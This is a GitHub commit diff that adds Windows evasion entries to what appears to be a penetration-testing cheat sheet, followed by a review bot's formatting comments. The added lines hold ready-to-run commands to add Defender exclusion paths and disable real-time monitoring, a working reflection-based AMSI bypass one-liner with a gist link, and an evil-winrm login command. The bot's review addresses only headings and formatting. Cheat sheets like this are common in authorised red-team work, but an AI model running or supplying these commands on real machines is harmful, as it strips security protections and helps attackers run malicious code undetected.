Update Cheat Sheet.md

ARZ 2022-07-16 23:41:15 +05:00 committed by GitHub
parent 561f4b91c1
commit 05c5690c0b
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

@ -387,6 +387,25 @@ Or
Get-ChildItem -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2\Exe
```
### Defender Add exclusion path
`Add-MpPreference -ExclusionPath C:\temp`
### Defender exclusion path
`reg query "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions" /s`
### Disabling defender
`Set-MpPreference -DisableRealtimeMonitoring $true`
### AMSI Bypass
```
$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils"){$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)
```
https://gist.github.com/pich4ya/e93abe76d97bd1cf67bfba8dce9c0093
### Evil-winrm
`evil-winrm -i IP -u <USER> -p <PASS>`
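Review bot: The two headings `### Defender Add exclusion path` and `### Defender exclusion path` are nearly identical, although the second entry is a `reg query` that lists the configured exclusions rather than adding one. Rename it to something like "List Defender exclusions", and match the capitalisation of "defender" in `### Disabling defender` to the other two headings. None of the three Defender entries says what privilege level it needs, which a reader of a cheat sheet will want to know before relying on it. The AMSI one-liner is pasted with single-letter variables and no sentence on what it changes or in which session it applies, and the gist URL sits as a bare line under the fence; add a one-line description above the block and turn the URL into a labelled source link. The new commands use inline backticks while the block just above the additions closes a fenced block, so pick one style for command entries. In the last entry the placeholders are inconsistent: `-i IP` is bare while `<USER>` and `<PASS>` use angle brackets, so write `<IP>`.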